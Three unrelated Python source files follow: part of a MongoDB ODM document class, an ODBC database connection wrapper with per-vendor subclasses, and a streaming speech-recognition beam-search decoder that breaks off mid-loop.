aggregation_pipeline=aggregation_pipeline,
projection_model=projection_model,
session=session,
ignore_cache=ignore_cache,
)
@classmethod
async def count(cls) -> int:
"""
Number of documents in the collection
The same as find_all().count()
:return: int
"""
return await cls.find_all().count()
# State management
@classmethod
def use_state_management(cls) -> bool:
"""
Is state management turned on
:return: bool
"""
return cls.get_settings().model_settings.use_state_management
def _save_state(self) -> None:
"""
Save current document state. Internal method
:return: None
"""
if self.use_state_management():
self._saved_state = get_dict(self)
def get_saved_state(self) -> Optional[Dict[str, Any]]:
"""
Saved state getter. It is a protected property.
:return: Optional[Dict[str, Any]] - saved state
"""
return self._saved_state
@classmethod
def _parse_obj_saving_state(cls: Type[DocType], obj: Any) -> DocType:
"""
Parse the object and then save its state. Internal method.
:param obj: Any
:return: DocType
"""
# if isinstance(obj, dict):
# for k in cls.get_link_fields().keys():
# obj[k] = obj.get(f"_link_{k}", None) or obj[k]
result: DocType = cls.parse_obj(obj)
result._save_state()
return result
@property # type: ignore
@saved_state_needed
def is_changed(self) -> bool:
if self._saved_state == get_dict(self, to_db=True):
return False
return True
@saved_state_needed
def get_changes(self) -> Dict[str, Any]:
# TODO search deeply
changes = {}
if self.is_changed:
current_state = get_dict(self, to_db=True)
for k, v in self._saved_state.items(): # type: ignore
if v != current_state[k]:
changes[k] = current_state[k]
return changes
@saved_state_needed
def rollback(self) -> None:
if self.is_changed:
for key, value in self._saved_state.items(): # type: ignore
if key == "_id":
setattr(self, "id", value)
else:
setattr(self, key, value)
# Initialization
@classmethod
def init_cache(cls) -> None:
"""
Init model's cache
:return: None
"""
if cls.get_settings().model_settings.use_cache:
cls._cache = LRUCache(
capacity=cls.get_settings().model_settings.cache_capacity,
expiration_time=cls.get_settings().model_settings.cache_expiration_time,
)
@classmethod
def init_fields(cls) -> None:
"""
Init class fields
:return: None
"""
if cls._link_fields is None:
cls._link_fields = {}
for k, v in cls.__fields__.items():
path = v.alias or v.name
setattr(cls, k, ExpressionField(path))
link_info = detect_link(v)
if link_info is not None:
cls._link_fields[v.name] = link_info
cls._hidden_fields = cls.get_hidden_fields()
@classmethod
async def init_settings(
cls, database: AsyncIOMotorDatabase, allow_index_dropping: bool
) -> None:
"""
Init document settings (collection and models)
:param database: AsyncIOMotorDatabase - motor database
:param allow_index_dropping: bool
:return: None
"""
# TODO: looks a little ugly. Too many parameter transfers.
cls._document_settings = await DocumentSettings.init(
database=database,
document_model=cls,
allow_index_dropping=allow_index_dropping,
)
@classmethod
def init_actions(cls):
"""
Init event-based actions
"""
ActionRegistry.clean_actions(cls)
for attr in dir(cls):
f = getattr(cls, attr)
if inspect.isfunction(f):
if hasattr(f, "has_action"):
ActionRegistry.add_action(
document_class=cls,
event_types=f.event_types, # type: ignore
action_direction=f.action_direction, # type: ignore
funct=f,
)
@classmethod
async def init_model(
cls, database: AsyncIOMotorDatabase, allow_index_dropping: bool
) -> None:
"""
Init wrapper
:param database: AsyncIOMotorDatabase
:param allow_index_dropping: bool
:return: None
"""
await cls.init_settings(
database=database, allow_index_dropping=allow_index_dropping
)
cls.init_fields()
cls.init_cache()
cls.init_actions()
# Other
@classmethod
def get_settings(cls) -> DocumentSettings:
"""
Get the document settings, which were created during
the initialization step
:return: DocumentSettings class
"""
if cls._document_settings is None:
raise CollectionWasNotInitialized
return cls._document_settings
@classmethod
def get_motor_collection(cls) -> AsyncIOMotorCollection:
"""
Get the Motor Collection for low-level access and control
:return: AsyncIOMotorCollection
"""
collection_meta = cls.get_settings().collection_settings
return collection_meta.motor_collection
@classmethod
async def inspect_collection(
cls, session: Optional[ClientSession] = None
) -> InspectionResult:
"""
Check if the documents stored in the MongoDB collection
are compatible with the Document schema
:return: InspectionResult
"""
inspection_result = InspectionResult()
async for json_document in cls.get_motor_collection().find(
{}, session=session
):
try:
cls.parse_obj(json_document)
except ValidationError as e:
if inspection_result.status == InspectionStatuses.OK:
inspection_result.status = InspectionStatuses.FAIL
inspection_result.errors.append(
InspectionError(
document_id=json_document["_id"], error=str(e)
)
)
return inspection_result
@classmethod
def get_hidden_fields(cls):
return set(
attribute_name
for attribute_name, model_field in cls.__fields__.items()
if model_field.field_info.extra.get("hidden") is True
)
def dict(
self,
*,
include: Union["AbstractSetIntStr", "MappingIntStrAny"] = None,
exclude: Union["AbstractSetIntStr", "MappingIntStrAny"] = None,
by_alias: bool = False,
skip_defaults: bool = None,
exclude_unset: bool = False,
exclude_defaults: bool = False,
exclude_none: bool = False,
) -> "DictStrAny":
"""
Overriding of the respective method from Pydantic.
Hides fields marked as "hidden".
"""
if exclude is None:
exclude = self._hidden_fields
return super().dict(
include=include,
exclude=exclude,
by_alias=by_alias,
skip_defaults=skip_defaults,
exclude_unset=exclude_unset,
exclude_defaults=exclude_defaults,
exclude_none=exclude_none,
)
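# A minimal sketch (field name hypothetical): declaring a field with
# Field(hidden=True) puts it into _hidden_fields via get_hidden_fields(), so
# doc.dict() omits it by default, while an explicit doc.dict(exclude=set())
# would include it again because exclude is no longer None.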
@wrap_with_actions(event_type=EventTypes.VALIDATE_ON_SAVE)
async def validate_self(self):
# TODO it can be sync, but needs some actions controller improvements
if self.get_settings().model_settings.validate_on_save:
self.parse_obj(self)
def to_ref(self):
if self.id is None:
raise DocumentWasNotSaved("Can not create dbref without id")
return DBRef(self.get_motor_collection().name, self.id)
async def fetch_link(self, field: Union[str, Any]):
ref_obj = getattr(self, field, None)
if isinstance(ref_obj, Link):
value = await ref_obj.fetch()
setattr(self, field, value)
if isinstance(ref_obj, list) and ref_obj:
values = await Link.fetch_list(ref_obj)
setattr(self, field, values)
async def fetch_all_links(self):
coros = []
link_fields = self.get_link_fields()
if link_fields is not None:
for ref in link_fields.values():
coros.append(self.fetch_link(ref.field)) # TODO lists
await asyncio.gather(*coros)
@classmethod
def get_link_fields(cls) -> Optional[Dict[str, LinkInfo]]:
return cls._link_fields
class Config:
json_encoders = {
ObjectId: lambda v: str(v),
}
allow_population_by_field_name = True
fields = {"id": "_id"}
@staticmethod
def schema_extra(
schema: Dict[str, Any], model: Type["Document"]
) -> None:
for field_name in model._hidden_fields:
schema.get("properties", {}).pop(field_name, None)
|
from enum import Enum
from cyanodbc import connect, Connection, SQLGetInfo, Cursor, DatabaseError, ConnectError
from typing import Optional
from cli_helpers.tabular_output import TabularOutputFormatter
from logging import getLogger
from re import sub
from threading import Lock, Event, Thread
from enum import IntEnum
formatter = TabularOutputFormatter()
class connStatus(Enum):
DISCONNECTED = 0
IDLE = 1
EXECUTING = 2
FETCHING = 3
ERROR = 4
class executionStatus(IntEnum):
OK = 0
FAIL = 1
OKWRESULTS = 2
class sqlConnection:
def __init__(
self,
dsn: str,
conn: Optional[Connection] = Connection(),
username: Optional[str] = "",
password: Optional[str] = ""
) -> None:
self.dsn = dsn
self.conn = conn
self.cursor: Cursor = None
self.query: str = None
self.username = username
self.password = password
self.status = connStatus.DISCONNECTED
self.logger = getLogger(__name__)
self._quotechar = None
self._search_escapechar = None
self._search_escapepattern = None
# Lock to be held by database interactions that happen
# in the main process. Recall, main-buffer as well as preview
# buffer queries get executed in a separate process; however,
# auto-completion as well as object browser expansion happen
# in the main process, possibly multi-threaded. Multi-threaded is fine:
# we don't want the main process to lock up while writing a query.
# However, we also don't want to potentially hammer the connection with
# multiple auto-completion result queries before each has had a chance
# to return.
self._lock = Lock()
self._fetch_res: list = None
self._execution_status: executionStatus = executionStatus.OK
self._execution_err: str = None
@property
def execution_status(self) -> executionStatus:
""" Hold the lock here since it gets assigned in execute
which can be called in a different thread """
with self._lock:
res = self._execution_status
return res
@property
def execution_err(self) -> str:
""" Last execution error: Cleared prior to every execution.
Hold the lock here since it gets assigned in execute
which can be called in a different thread """
with self._lock:
res = self._execution_err
return res
@property
def quotechar(self) -> str:
if self._quotechar is None:
self._quotechar = self.conn.get_info(
SQLGetInfo.SQL_IDENTIFIER_QUOTE_CHAR)
# pyodbc note
# self._quotechar = self.conn.getinfo(
return self._quotechar
@property
def search_escapechar(self) -> str:
if self._search_escapechar is None:
self._search_escapechar = self.conn.get_info(
SQLGetInfo.SQL_SEARCH_PATTERN_ESCAPE)
return self._search_escapechar
@property
def search_escapepattern(self) -> str:
if self._search_escapepattern is None:
# https://stackoverflow.com/questions/2428117/casting-raw-strings-python
self._search_escapepattern = \
(self.search_escapechar).encode("unicode-escape").decode() + "\\1"
return self._search_escapepattern
def sanitize_search_string(self, term) -> str:
if term is not None and len(term):
res = sub("(_|%)", self.search_escapepattern, term)
else:
res = term
return res
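# A minimal sketch, assuming the driver reports "\" as its search pattern
# escape character: sanitize_search_string("my_table") would return "my\_table"
# and sanitize_search_string("100%") would return "100\%", so that "_" and "%"
# are matched literally by SQLTables/SQLColumns instead of as wildcards.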
def connect(
self,
username: str = "",
password: str = "",
force: bool = False) -> None:
uid = username or self.username
pwd = password or self.password
conn_str = "DSN=" + self.dsn + ";"
if len(uid):
self.username = uid
conn_str = conn_str + "UID=" + uid + ";"
if len(pwd):
self.password = pwd
conn_str = conn_str + "PWD=" + pwd + ";"
if force or not self.conn.connected():
try:
self.conn = connect(dsn = conn_str, timeout = 5)
self.status = connStatus.IDLE
except ConnectError as e:
self.logger.error("Error while connecting: %s", str(e))
raise ConnectError(e)
def fetchmany(self, size, event: Event = None) -> list:
with self._lock:
if self.cursor:
self._fetch_res = self.cursor.fetchmany(size)
else:
self._fetch_res = []
if event is not None:
event.set()
return self._fetch_res
def async_fetchmany(self, size) -> list:
""" async_ is a misnomer here. It does execute the fetch in a new thread,
but it will also wait for execution to complete. At this time
this helps us with registering KeyboardInterrupt during
cyanodbc.fetchmany only; it may evolve to have more truly async-like behavior.
"""
exec_event = Event()
t = Thread(
target = self.fetchmany,
kwargs = {"size": size, "event": exec_event},
daemon = True)
t.start()
# Will block but can be interrupted
exec_event.wait()
return self._fetch_res
def execute(self, query, parameters = None, event: Event = None) -> Cursor:
self.logger.debug("Execute: %s", query)
with self._lock:
self.close_cursor()
self.cursor = self.conn.cursor()
try:
self._execution_err = None
self.status = connStatus.EXECUTING
self.cursor.execute(query, parameters)
self.status = connStatus.IDLE
self._execution_status = executionStatus.OK
self.query = query
except DatabaseError as e:
self._execution_status = executionStatus.FAIL
self._execution_err = str(e)
self.logger.warning("Execution error: %s", str(e))
if event is not None:
event.set()
return self.cursor
def async_execute(self, query) -> Cursor:
""" async_ is a misnomer here. It does execute the query in a new thread,
but it will also wait for execution to complete. At this time
this helps us with registering KeyboardInterrupt during
cyanodbc.execute only; it may evolve to have more truly async-like behavior.
"""
exec_event = Event()
t = Thread(
target = self.execute,
kwargs = {"query": query, "parameters": None, "event": exec_event},
daemon = True)
t.start()
# Will block but can be interrupted
exec_event.wait()
return self.cursor
def list_catalogs(self) -> list:
# pyodbc note
# return conn.cursor().tables(catalog = "%").fetchall()
res = []
try:
if self.conn.connected():
self.logger.debug("Calling list_catalogs...")
with self._lock:
res = self.conn.list_catalogs()
self.logger.debug("list_catalogs: done")
except DatabaseError as e:
self.status = connStatus.ERROR
self.logger.warning("list_catalogs: %s", str(e))
return res
def list_schemas(self, catalog = None) -> list:
res = []
# We only trust this generic implementation if attempting to list
# schemata in the current catalog (or the catalog argument is None)
if catalog is not None and not catalog == self.current_catalog():
return res
try:
if self.conn.connected():
self.logger.debug("Calling list_schemas...")
with self._lock:
res = self.conn.list_schemas()
self.logger.debug("list_schemas: done")
except DatabaseError as e:
self.status = connStatus.ERROR
self.logger.warning("list_schemas: %s", str(e))
return res
def find_tables(
self,
catalog = "",
schema = "",
table = "",
type = "") -> list:
res = []
try:
if self.conn.connected():
self.logger.debug("Calling find_tables: %s, %s, %s, %s",
catalog, schema, table, type)
with self._lock:
res = self.conn.find_tables(
catalog = catalog,
schema = schema,
table = table,
type = type)
self.logger.debug("find_tables: done")
except DatabaseError as e:
self.logger.warning("find_tables: %s.%s.%s, type %s: %s", catalog, schema, table, type, str(e))
return res
def find_columns(
self,
catalog = "",
schema = "",
table = "",
column = "") -> list:
res = []
try:
if self.conn.connected():
self.logger.debug("Calling find_columns: %s, %s, %s, %s",
catalog, schema, table, column)
with self._lock:
res = self.conn.find_columns(
catalog = catalog,
schema = schema,
table = table,
column = column)
self.logger.debug("find_columns: done")
except DatabaseError as e:
self.logger.warning("find_columns: %s.%s.%s, column %s: %s", catalog, schema, table, column, str(e))
return res
def current_catalog(self) -> str:
if self.conn.connected():
return self.conn.catalog_name
return None
def connected(self) -> bool:
return self.conn.connected()
def catalog_support(self) -> bool:
res = self.conn.get_info(SQLGetInfo.SQL_CATALOG_NAME)
return res == True or res == 'Y'
# pyodbc note
# return self.conn.getinfo(pyodbc.SQL_CATALOG_NAME) == True or self.conn.getinfo(pyodbc.SQL_CATALOG_NAME) == 'Y'
def get_info(self, code: int) -> str:
return self.conn.get_info(code)
def close(self) -> None:
# TODO: When disconnecting
# We likely don't want to allow any exception to
# propagate. Catch DatabaseError?
if self.conn.connected():
self.conn.close()
def close_cursor(self) -> None:
if self.cursor:
self.cursor.close()
self.cursor = None
self.query = None
def cancel(self) -> None:
if self.cursor:
self.cursor.cancel()
self.query = None
def preview_query(self, table, filter_query = "", limit = -1) -> str:
qry = "SELECT * FROM " + table + " " + filter_query
if limit > 0:
qry = qry + " LIMIT " + str(limit)
return qry
def formatted_fetch(self, size, cols, format_name = "psql"):
while True:
res = self.async_fetchmany(size)
if len(res) < 1:
break
else:
yield "\n".join(
formatter.format_output(
res,
cols,
format_name = format_name))
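# A minimal usage sketch (DSN and query are hypothetical): after a successful
# execute, formatted_fetch() yields one rendered page per fetchmany batch.
#
#   conn = sqlConnection(dsn="MyDSN")
#   conn.connect()
#   crsr = conn.async_execute("SELECT a, b FROM t")
#   cols = [d[0] for d in crsr.description]  # assumes a DB-API style cursor
#   for page in conn.formatted_fetch(500, cols, format_name="psql"):
#       print(page)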
connWrappers = {}
class MSSQL(sqlConnection):
def find_tables(
self,
catalog = "",
schema = "",
table = "",
type = "") -> list:
""" FreeTDS does not allow us to query with catalog == '' and
schema == '', which, according to the ODBC spec for SQLTables, should
return tables outside of any catalog/schema. In the case of FreeTDS,
what gets passed to the sp_tables sproc is null, which in turn
is interpreted as a wildcard. For the time being, intercept
these queries here (used in auto-completion) and return an empty
set. """
if catalog == "\x00" and schema == "\x00":
return []
return super().find_tables(
catalog = catalog,
schema = schema,
table = table,
type = type)
def list_schemas(self, catalog = None) -> list:
""" Optimization for listing out-of-database schemas by
always querying catalog.sys.schemas. """
res = []
qry = "SELECT name FROM {catalog}.sys.schemas " \
"WHERE name NOT IN ('db_owner', 'db_accessadmin', " \
"'db_securityadmin', 'db_ddladmin', 'db_backupoperator', " \
"'db_datareader', 'db_datawriter', 'db_denydatareader', " \
"'db_denydatawriter')"
if catalog is None and self.current_catalog():
catalog = self.sanitize_search_string(self.current_catalog())
if catalog:
try:
self.logger.debug("Calling list_schemas...")
crsr = self.execute(qry.format(catalog = catalog))
res = crsr.fetchall()
crsr.close()
self.logger.debug("Calling list_schemas: done")
schemas = [r[0] for r in res]
if len(schemas):
return schemas
except DatabaseError as e:
self.logger.warning("MSSQL list_schemas: %s", str(e))
return super().list_schemas(catalog = catalog)
def preview_query(
self,
table,
filter_query = "",
limit = -1) -> str:
qry = " * FROM " + table + " " + filter_query
if limit > 0:
qry = "SELECT TOP " + str(limit) + qry
else:
qry = "SELECT" + qry
return qry
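# A minimal sketch (table and filter are hypothetical) of how the base class
# and the MSSQL wrapper express the row limit differently:
#   base sqlConnection:  conn.preview_query("my_table", "WHERE x > 0", 100)
#     -> "SELECT * FROM my_table WHERE x > 0 LIMIT 100"
#   MSSQL wrapper:       conn.preview_query("my_table", "WHERE x > 0", 100)
#     -> "SELECT TOP 100 * FROM my_table WHERE x > 0"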
class PSSQL(sqlConnection):
def find_tables(
self,
catalog = "",
schema = "",
table = "",
type = "") -> list:
""" At least the psql ODBC driver I am using has an annoying habit
of treating the catalog and schema fields interchangeably, which
in turn breaks completion"""
if not catalog in [self.current_catalog(), self.sanitize_search_string(self.current_catalog())]:
return []
return super().find_tables(
catalog = catalog,
schema = schema,
table = table,
type = type)
def find_columns(
self,
catalog = "",
schema = "",
table = "",
column = "") -> list:
""" At least the psql ODBC driver I am using has an annoying habit
of treating the catalog and schema fields interchangeably, which
in turn breaks completion"""
if not catalog in [self.current_catalog(), self.sanitize_search_string(self.current_catalog())]:
return []
return super().find_columns(
catalog = catalog,
schema = schema,
table = table,
column = column)
class MySQL(sqlConnection):
def list_schemas(self, catalog = None) -> list:
""" MySQL only has catalogs, it seems; however, list_schemas
returns [""], which causes blank entries to show up in auto
completion. It also confuses some of the checks we have
that look for len(list_schemas) < 1 to decide whether
to fall back to find_tables. Make sure that for MySQL
we do, in fact, fall back to find_tables"""
return []
def find_tables(
self,
catalog = "",
schema = "",
table = "",
type = "") -> list:
if catalog in ["", "null"] and schema not in ["", "null"]:
catalog = schema
schema = ""
return super().find_tables(
catalog = catalog,
schema = schema,
table = table,
type = type)
def find_columns(
self,
catalog = "",
schema = "",
table = "",
column = "") -> list:
if catalog in ["", "null"] and schema not in ["", "null"]:
catalog = schema
schema = ""
return super().find_columns(
catalog = catalog,
schema = schema,
table = table,
column = column)
class SQLite(sqlConnection):
def list_schemas(self, catalog = None) -> list:
"""Easy peasy"""
return []
def list_catalogs(self) -> list:
"""Easy peasy"""
return []
class Snowflake(sqlConnection):
def find_tables(
self,
catalog = "",
schema = "",
table = "",
type = "") -> list:
type = type.upper()
return super().find_tables(
catalog = catalog,
schema = schema,
table = table,
type = type)
connWrappers["MySQL"] = MySQL
connWrappers["Microsoft SQL Server"] = MSSQL
connWrappers["SQLite"] = SQLite
connWrappers["PostgreSQL"] = PSSQL
connWrappers["Snowflake"] = Snowflake
|
"""
Copyright (c) 2021, salesforce.com, inc.
All rights reserved.
SPDX-License-Identifier: BSD-3-Clause
For full license text, see the LICENSE file in the repo root or https://opensource.org/licenses/BSD-3-Clause
"""
from argparse import Namespace
import logging
import torch
import json
import numpy
import math
from espnet.nets.pytorch_backend.transformer.subsampling import _context_concat
from speech_datasets import SpeechDataLoader
from espnet.nets.asr_interface import ASRInterface
from espnet.utils.deterministic_utils import set_deterministic_pytorch
from espnet.asr.pytorch_backend.asr_init import load_trained_model
from espnet.asr.asr_utils import get_model_conf
import espnet.nets.pytorch_backend.lm.default as lm_pytorch
from espnet.asr.asr_utils import torch_load
from espnet.asr.asr_utils import add_results_to_json
from espnet.asr.pytorch_backend.asr_dsl import _recursive_to, CustomConverter
NEG_INF = - 999999999.9
def recog(args):
"""Decode with the given args.
Args:
args (namespace): The program arguments.
"""
set_deterministic_pytorch(args)
# Weiran: the model shall be trained with certain left context and right context.
model, train_args = load_trained_model(args.model)
assert isinstance(model, ASRInterface)
model.recog_args = args
# read rnnlm
if args.rnnlm:
rnnlm_args = get_model_conf(args.rnnlm, args.rnnlm_conf)
if getattr(rnnlm_args, "model_module", "default") != "default":
raise ValueError("use '--api v2' option to decode with non-default language model")
rnnlm = lm_pytorch.ClassifierWithState(
lm_pytorch.RNNLM(len(train_args.char_list), rnnlm_args.layer, rnnlm_args.unit))
torch_load(args.rnnlm, rnnlm)
rnnlm.eval()
else:
rnnlm = None
# Read truth file.
if args.truth_file:
with open(args.truth_file, "r") as fin:
retval = fin.read().rstrip('\n')
dict_truth = dict([(l.split()[0], " ".join(l.split()[1:])) for l in retval.split("\n")])
"""
# gpu
if args.ngpu == 1:
gpu_id = list(range(args.ngpu))
logging.info('gpu id: ' + str(gpu_id))
model.cuda()
if rnnlm:
rnnlm.cuda()
"""
new_js = {}
recog_converter = CustomConverter(input_context=args.input_context, input_skiprate=args.input_skiprate,
mode="eval", dtype=torch.float32)
recog_data = list(filter(lambda s: len(s) > 0, map(lambda s: s.strip(), args.recog_sets.split(","))))
recog_loader = SpeechDataLoader(recog_data, task="asr", shuffle=False,
precomputed_feats_type=args.precomputed_feats_type,
batch_size=1, spmodel=args.spmodel, token_list=train_args.char_list,
transform_conf=args.preprocess_conf, train=False, num_workers=args.loader_num_worker,
data_cache_mb=args.loader_cache_mb, num_replicas=args.num_replicas, rank=args.jobid-1,
ensure_equal_parts=False, text_filename=args.text_filename)
with torch.no_grad():
idx = 0
for batch in recog_loader:
idx += 1
name = batch[0]['uttid']
logging.info('(%d/%d) decoding ' + name, idx, len(recog_loader))
feat = _recursive_to(recog_converter(batch), device=torch.device('cpu'))[0]
feat = feat[0]
if args.truth_file and name in dict_truth:
truth_text = dict_truth[name]
else:
truth_text = ""
nbest_hyps = recognize_online(model, feat, args, train_args.char_list, rnnlm, truth_text=truth_text, blankidx=0)
# Weiran: prepare dict in order to add decoding results. Skipped the input and shape information.
gt_tokens = [int(_) for _ in batch[0]["labels"]]
tmp_dict = {"output": [{"name": "target1", "text": batch[0]["text"],
"tokenid": " ".join([str(_) for _ in gt_tokens]).strip(),
"token": " ".join([train_args.char_list[_] for _ in gt_tokens]).strip()}],
"utt2spk": batch[0]["speaker"]}
# Weiran: I am adding text in words in the result json.
new_js[name] = add_results_to_json(tmp_dict, nbest_hyps, train_args.char_list, copy_times=True)
with open(args.result_label, 'wb') as f:
f.write(json.dumps({'utts': new_js}, indent=4, ensure_ascii=False, sort_keys=True).encode('utf_8'))
def logsumexp(*args):
"""
Stable log sum exp.
"""
if all(a == NEG_INF for a in args):
return NEG_INF
a_max = max(args)
lsp = math.log(sum(math.exp(a - a_max) for a in args))
return a_max + lsp
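# A minimal sketch of why the max is factored out first: with very negative log
# probabilities a naive sum underflows,
#   math.log(math.exp(-1000.0) + math.exp(-1001.0))   -> ValueError (log of 0.0)
# while the stable version stays finite,
#   logsumexp(-1000.0, -1001.0)                       -> approximately -999.69
# and logsumexp(NEG_INF, NEG_INF) returns NEG_INF via the early-exit branch.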
def recognize_online(model, input, recog_args, char_list, rnnlm=None, truth_text="", blankidx=0):
"""Recognize input speech.
:param model: the trained hybrid att+CTC model.
:param ndarray input: input acoustic feature (T, D)
:param Namespace recog_args: argument Namespace containing options
:param list char_list: list of characters
:param int blankidx: the index of the CTC <blank> symbol
:param torch.nn.Module rnnlm: language model module
:param string truth_text: ground truth text for the utterance
:return: N-best decoding results
:rtype: list
"""
# Assuming this is a streaming-compliant encoder.
enc_output = model.encode(input).unsqueeze(0)
# Use ctc beams to obtain timing for attention model.
lpz = model.ctc.log_softmax(enc_output)
lpz = lpz.detach().numpy().squeeze(0)
# Max time.
T = lpz.shape[0]
S = lpz.shape[1]
logging.info('input lengths: %s' % T)
logging.info('vocab size: %s' % S)
if truth_text:
logging.info("Ground truth in words:")
logging.info(truth_text)
# Search parameters.
beam_size = recog_args.beam_size
penalty = recog_args.penalty
ctc_weight = recog_args.ctc_weight
ctc_max_active = recog_args.streaming_ctc_maxactive
blank_offset = recog_args.streaming_ctc_blank_offset
# Some new search parameters not existing in offline decoding.
beam_width = recog_args.streaming_beam_width
# att_delay is the estimate of attention span of each output token.
# att_delay can be set to the value used for CTC-triggered attention training.
att_delay = recog_args.streaming_att_delay
# Weiran: I am now allowing some bounded delay for decoder, this could be different from att_delay.
dec_delay = recog_args.streaming_dec_delay
# The initial CTC-prefix search phase uses a larger beamsize.
ctc_scoring_ratio = recog_args.streaming_scoring_ratio
# Prepare sos and eos.
eos_idx = model.eos
y = model.sos
vy = enc_output.new_zeros(1).long()
vy[0] = y
# Initialize CTC hypothesis.
rnnlm_state, rnnlm_scores = rnnlm.predict(None, vy)
rnn_num_layers = len(rnnlm_state['c'])
rnnlm_scores = rnnlm_scores.squeeze(0).numpy()
# ctc_scores are probabilities of prefix ending with blank and non_blank.
# prev_score tracks the score right before a new token is added.
hyp_ctc = {'ctc_scores': (0.0, NEG_INF), 'prev_score': 0.0,
'accum_lmscore': 0.0, 'rnnlm_state': rnnlm_state, 'rnnlm_scores': rnnlm_scores, 'ctc_times': [-1]}
# Initialize att hypothesis.
# The name cache is consistent with that for attention layers.
hyp_att = {'att_score': 0.0, 'att_score_last': 0.0, 'cache': None, 'att_times': [-1]}
# We will maintain two set of hypothesis, for the att and ctc model respectively.
# Use dict for hypothesis sets so that it is efficient to determine certain hypo appears in each set.
hyps_ctc = dict()
hyps_att = dict()
# There is only one partial hypothesis for now.
l = tuple([model.sos])
hyps_ctc[l] = hyp_ctc
hyps_att[l] = hyp_att
# Perform frame synchronous decoding for CTC. t is index for frame.
for t in range(T): # Loop over time.
logging.debug("\n")
logging.debug("=" * 80)
logging.debug("CTC beam search at frame %d ..." % t)
hyps_new = dict()
# CTC-PREFIX beam search.
# Logic is mostly taken from https://gist.github.com/awni/56369a90d03953e370f3964c826ed4b0
active_set = numpy.argpartition(lpz[t], -ctc_max_active)[-ctc_max_active:]
for s in active_set:
p = lpz[t, s]
# logging.debug("logprob for token %d (%s): %f" % (s, char_list[s], p))
for l in hyps_ctc:
p_b, p_nb = hyps_ctc[l]['ctc_scores']
prev_score = hyps_ctc[l]['prev_score']
rnnlm_state = hyps_ctc[l]['rnnlm_state']
rnnlm_scores = hyps_ctc[l]['rnnlm_scores']
accum_lmscore = hyps_ctc[l]['accum_lmscore']
ctc_times = hyps_ctc[l]['ctc_times']
if s==blankidx: # blank. Not outputting a new token.
p = p + blank_offset
if l in hyps_new:
p_b_new, p_nb_new = hyps_new[l]['ctc_scores']
else:
p_b_new, p_nb_new = NEG_INF, NEG_INF
# Only the probability of ending in blank gets updated.
ctc_scores_new = (logsumexp(p_b_new, p_b + p, p_nb + p), p_nb_new)
hyps_new[l] = {'ctc_scores': ctc_scores_new, 'prev_score': prev_score,
'accum_lmscore': accum_lmscore,
'rnnlm_state': rnnlm_state, 'rnnlm_token': -1, 'rnnlm_scores': rnnlm_scores,
'ctc_times': list(ctc_times)}
else:
if s == l[-1]:
# CTC does not model the acoustic scores of <sos> and <eos>.
# I doubt this can happen when active_set does not contain everything.
if len(l)==1:
continue
# Choice 1: Not outputting a new token.
if l in hyps_new:
p_b_new, p_nb_new = hyps_new[l]['ctc_scores']
else:
p_b_new, p_nb_new = NEG_INF, NEG_INF
ctc_scores_new = (p_b_new, logsumexp(p_nb_new, p_nb + p))
hyps_new[l] = {'ctc_scores': ctc_scores_new, 'prev_score': prev_score,
'accum_lmscore': accum_lmscore,
'rnnlm_state': rnnlm_state, 'rnnlm_token': -1, 'rnnlm_scores': rnnlm_scores,
'ctc_times': list(ctc_times)}
# Choice 2: Outputting a new token.
newl = l + (s,)
if newl in hyps_new:
p_b_new, p_nb_new = hyps_new[newl]['ctc_scores']
ctc_times = list(hyps_new[newl]['ctc_times'])
else:
p_b_new, p_nb_new = NEG_INF, NEG_INF
ctc_times = ctc_times + [t]
ctc_scores_new = (p_b_new, logsumexp(p_nb_new, p_b + p))
hyps_new[newl] = {'ctc_scores': ctc_scores_new, 'prev_score': logsumexp(p_b, p_nb),
'accum_lmscore': accum_lmscore + rnnlm_scores[s],
'rnnlm_state': rnnlm_state, 'rnnlm_token': s, 'rnnlm_scores': rnnlm_scores,
'ctc_times': ctc_times}
else:
# Must output new token.
newl = l + (s,)
if newl in hyps_new:
p_b_new, p_nb_new = hyps_new[newl]['ctc_scores']
ctc_times = list(hyps_new[newl]['ctc_times'])
else:
p_b_new, p_nb_new = NEG_INF, NEG_INF
ctc_times = ctc_times + [t]
ctc_scores_new = (p_b_new, logsumexp(p_nb_new, p_b + p, p_nb + p))
hyps_new[newl] = {'ctc_scores': ctc_scores_new, 'prev_score': logsumexp(p_b, p_nb),
'accum_lmscore': accum_lmscore + rnnlm_scores[s],
'rnnlm_state': rnnlm_state, 'rnnlm_token': s, 'rnnlm_scores': rnnlm_scores,
'ctc_times': ctc_times}
# End of loop over active set.
# End of loop over hyps.
# Sort and trim the beams for one time step.
# First dictionary to list.
hyps_list = [(k, hyps_new[k]) for k in hyps_new]
del hyps_new
# Check the equation for computing total score for pruning.
hyps_list = sorted(hyps_list,
key=lambda x: logsumexp(*x[1]['ctc_scores']) + recog_args.lm_weight * x[1]['accum_lmscore'] + penalty * (len(x[0])-1),
reverse=True)[:(beam_size * ctc_scoring_ratio)]
# Get total score for top beam.
score_thres = \
logsumexp(*hyps_list[0][1]['ctc_scores']) + recog_args.lm_weight * hyps_list[0][1]['accum_lmscore'] + penalty * (len(hyps_list[0][0])-1)
# Remove hyps whose total score is below that of top beam by beam_width.
hyps_list = list(filter(lambda x: score_thres-beam_width <=
logsumexp(*x[1]['ctc_scores']) + recog_args.lm_weight * x[1]['accum_lmscore'] + penalty * (len(x[0])-1), hyps_list))
# Back up the top beams for JOINT. Note that we do not have ctc_scoring_ratio here.
ctc_top_keys = set([k for (k, v) in hyps_list[:min(len(hyps_list), beam_size)]])
# Batch-update the rnnlm_state and rnnlm_scores for hyps whose rnnlm_token are non-negative.
tokens_to_update = [v['rnnlm_token'] for (k, v) in hyps_list if v['rnnlm_token']>=0]
if tokens_to_update:
# Each rnnlm_state is a dict, so this is a list of dict.
# Each dict has 'c' and 'h', each state is a list of tensors over layers.
states_to_update = [v['rnnlm_state'] for (k, v) in hyps_list if v['rnnlm_token'] >= 0]
tmp_states = dict()
# First group samples, then group layers.
tmp_states['c'] = [torch.cat([ss['c'][i] for ss in states_to_update], 0) for i in range(rnn_num_layers)]
tmp_states['h'] = [torch.cat([ss['h'][i] for ss in states_to_update], 0) for i in range(rnn_num_layers)]
logging.debug("\nForwarding rnnlm of %d samples" % len(tokens_to_update))
new_rnnlm_states, new_rnnlm_scores = rnnlm.predict(tmp_states, torch.tensor(tokens_to_update).long())
hyps_ctc = dict()
tmp_count = 0
for k, v in hyps_list:
if v['rnnlm_token'] >= 0:
v['rnnlm_state'] = {'c': [new_rnnlm_states['c'][i][tmp_count, :].unsqueeze(0) for i in range(rnn_num_layers)],
'h': [new_rnnlm_states['h'][i][tmp_count, :].unsqueeze(0) for i in range(rnn_num_layers)]}
